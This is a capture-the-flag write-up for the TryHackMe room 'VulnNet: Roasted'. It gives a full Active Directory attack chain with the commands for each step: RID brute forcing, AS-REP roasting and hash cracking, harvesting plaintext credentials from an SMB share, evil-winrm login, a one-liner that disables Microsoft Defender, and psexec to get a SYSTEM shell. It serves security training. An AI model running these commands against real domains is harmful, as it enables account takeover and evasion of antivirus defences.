VulnNet: Roasted

https://tryhackme.com/room/vulnnetroasted

Nmap

sudo nmap 10.10.217.198 -p- -sS -sV                                                   

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-03 09:12:47Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Rid Brute Force

Starting off we find we have guest access to SMB and are able to enumerate users through rid brute forcing with crackmapexec.

crackmapexec smb '10.10.217.198' -u 'a' -p '' -d 'vulnnet-rst.local' --rid-brute

ASREP-Roasting

With a small list of users we run the discovered usernames against GetNPUsers.py to identify accounts with "No Pre-authentication required" (ASREP Roasting).enabled in Active Directory.

GetNPUsers.py 'vulnnet-rst.local'/ -usersfile ~/Desktop/users -dc-ip '10.10.217.198' -format 'hashcat' 

Cracking the Hash

We discover that the user t-skid is ASREP roastable. Using hashcat we are soon able to crack the password hash using the rockyou.txt wordlist.

hashcat -a 0 -m 18200 ~/Desktop/hash /usr/share/wordlists/rockyou.txt -O

SMB enumeration

With the new found credentials for the use t-skid we turn back to further SMB enumeration against the target Domain Controller.

We find we are able to read within the "Scripts" share and identify the file ResetPassword.vbs as a file of interest.

smbmap -H '10.10.217.198' -u 't-skid' -p '<Password>' -d 'vulnnet-rst.local' -R

Plain Text Credentials

Using smbmap the .vbs file is downloaded. Upon reading the code we are able to identify alternative user credentials in plain text.

smbmap -H '10.10.217.198' -u 't-skid' -p '<Password>' -d 'vulnnet-rst.local' -R -A .vbs

Privilege Checking

Checking the user access level with crackmapexec we identify the user as being the Domain Administrator.

crackmapexec smb '10.10.217.198' -u 'a-whitehat' -p '<Password> -d 'vulnnet-rst.local'  -x "whoami /all"

User flag and WinRM

With administrative capabilties we are able to login over WinRM with Evil-WinRm.

evil-winrm -i '10.10.217.198' -u 'a-whitehat' -p '<Password>'

After logging in we successfully obtain the user.txt flag. However, the system.txt flag is off limits.

Disabling Anti-Virus

In order to obtain a SYSTEM shell we will need to ideally run psexec.py. Firstly, we need to disable the anti-virus on the target host as otherwise psexec.py will not be able to execute.

Run the following command within the Evil-WinRM session.

Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MPPreference -DisableBehaviorMonitoring $true;Set-MPPreference -DisableBlockAtFirstSeen $true;Set-MPPreference -DisableEmailScanning $true;Set-MPPReference -DisableScriptScanning $true;Set-MpPreference -DisableIOAVProtection $true

Root Flag and System shell

After disabling Microsoft Defender we are then able to externally run psexec.py to obtain a SYSTEM shell.

psexec.py vulnnet-rst.local/a-whitehat:'<Password>'@'10.10.217.198'